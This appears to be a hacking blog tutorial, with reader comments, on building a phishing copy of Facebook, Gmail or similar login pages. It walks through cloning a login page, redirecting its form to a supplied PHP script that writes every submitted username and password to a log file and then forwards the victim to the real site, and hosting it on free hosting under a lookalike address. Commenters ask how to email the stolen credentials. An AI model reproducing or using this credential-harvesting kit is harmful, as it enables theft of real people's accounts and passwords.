in

Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.

So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name “login.htm” .

or alternatively right click on the page and click “view source” and copy all of it and save them to a notepad file. Rename the file with “login.htm”.

Now the second part of the hack-
Go to Notepad and copy this into it-


<?php

header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "rn");

}

fwrite($handle, "rn");

fclose($handle);

exit;

?>

replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php

Now you need to edit the “login.htm” file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like “action=” which has something with login. And replace the URl with “fish.php”.

Also create a blank txt file with name “log.txt” . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like – http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.
bu hackiteasy

Go to our new site- shankee.com

What do you think?

0 points
Upvote Downvote

Comments

Leave a Reply
  1. @royal yes… get a free hosting and sure you can send this to anyone's email.
    But now facebook will warn the victim that he is not coming from the original page and he should change the password…

  2. thanks man! great work indeed! one i just want to know, how to send the login user name and password to my email instead of log.txt, any idea?
    Stay cool!

  3. I tried it but when i open login.html with chrome and click on login it opens code of fish.php and nothing happens and when i open with internet explorer it shows me option to download fish.php and nothnig happens plz mail me wht to do at [email protected]

  4. hi have crated phishing page of fb
    but in my log.txt email and pass are not storing.
    even memory of log.txt is incresing but whwn i open it shows nothing how do i fix it ?

Leave a Reply

Your email address will not be published. Required fields are marked *

Loading…

0

Comments

0 comments

Installing John The ripper on Linux machine

Tutorial: sql injection